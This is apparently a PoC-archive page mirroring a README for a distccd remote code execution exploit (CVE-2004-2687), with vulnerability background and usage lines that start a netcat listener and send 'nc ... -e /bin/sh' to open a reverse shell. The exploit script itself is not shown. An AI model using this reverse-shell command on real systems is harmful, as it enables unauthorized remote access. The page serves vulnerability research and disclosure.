Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2004-2687 PoC — Apple Xcode Tools 配置错误漏洞

Source
Associated Vulnerability
Title:Apple Xcode Tools 配置错误漏洞 (CVE-2004-2687)
Description:用于XCode 1.5版本及其他版本的distcc 2.x版本配置对于服务器端口的访问不限制时,远程攻击者可以借助编辑工作执行任意命令,该漏洞被无授权检查的服务器执行。
Readme
# distccd_rce_CVE-2004-2687

🖥️ -h3x0v3rl0rd-
#️⃣ CVE-2004-2687
#️⃣ Upgrade to Python3

Overview

This repository contains a Proof of Concept (PoC) exploit for the distccd vulnerability identified as `CVE-2004-2687`. The vulnerability exists in the `distccd` daemon, which is part of the distcc distributed C/C++ compilation system. When improperly configured, `distccd` allows remote attackers to execute arbitrary commands on the server without any authentication.
Vulnerability Details

distcc is designed to distribute compilation tasks across multiple machines to speed up the build process. However, if the distccd daemon is not properly secured, it exposes a remote code execution (RCE) vulnerability. This occurs because the daemon listens on a network port and accepts commands from any client, allowing them to execute shell commands on the server as the user running the daemon.

The vulnerability has been assigned `CVE-2004-2687` and affects `distccd` versions prior to 3.1. When exploited, an attacker can gain shell access to the vulnerable machine, leading to potential compromise of the entire system.


	nc -lvp 4444
	python3 distccd_rce.py -t [rhost] -p 3632 -c "nc [localhost] [lport] -e /bin/sh"

Vulnerability :

![image](https://user-images.githubusercontent.com/66146701/124954485-9916f480-dfc2-11eb-8623-3b802610200b.png)

Exploit :

![image](https://github.com/user-attachments/assets/79291800-e6ec-44a4-a942-ed1018998204)
File Snapshot

[4.0K] /data/pocs/4c59ea604a11b083ddea88592298ae825002ad28 ├── [2.7K] distccd_rce.py └── [1.4K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.